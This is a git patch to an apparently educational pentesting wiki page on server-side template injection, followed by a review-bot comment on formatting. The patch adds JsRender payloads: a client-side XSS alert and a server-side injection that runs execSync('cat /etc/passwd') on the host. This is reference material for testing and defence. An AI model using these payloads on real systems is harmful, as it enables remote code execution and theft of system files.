From 77cd9471fb37695fe9328eb65080a207571a4649 Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 1 Dec 2020 16:50:24 +0000 Subject: [PATCH] GitBook: [master] one page modified --- .../ssti-server-side-template-injection.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md index 8713075cd..97b6a4d7f 100644 --- a/pentesting-web/ssti-server-side-template-injection.md +++ b/pentesting-web/ssti-server-side-template-injection.md @@ -220,6 +220,33 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d% * [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) +### JsRender \(NodeJS\) + +| **Template** | **Description** | +| :--- | :--- | +| {{: …}} | Evaluate and render output | +| {{> …}} | Evaluate and render HTML encoded output | +| {{!– … –}} | Comment | +| {{\* …}} and {{\*: …}} | Allow code \(disabled by default\) | + +* {{:7\*7}} = 49 + +#### Client Side + +```text +{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}} +``` + +#### Server Side + +```bash +{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}} +``` + +#### More information + +* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/) + ### ERB \(Ruby\) * `{{7*7}} = {{7*7}}`
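Review bot: In the added JsRender table, the comment row `{{!– … –}}` is written with en dashes rather than two ASCII hyphens, so the tag as shown is not the literal `{{!-- … --}}` syntax. This looks like smart-punctuation conversion; putting each tag in the Template column inside inline code would keep the delimiters intact. Two consistency points in the same hunk: the "Server Side" block is fenced as `bash` although its content is a template expression, not shell, so `text` (as used for the "Client Side" block) is the accurate tag; and the detection bullet `{{:7\*7}} = 49` should be in backticks like the `{{7*7}} = {{7*7}}` bullet in the ERB section that follows, which also removes the need for the escaped `\*`. Since the table notes that `{{* …}}` is disabled by default, one sentence saying that both examples use the `{{: …}}` tag would help a reader see that the default setting is not what prevents them.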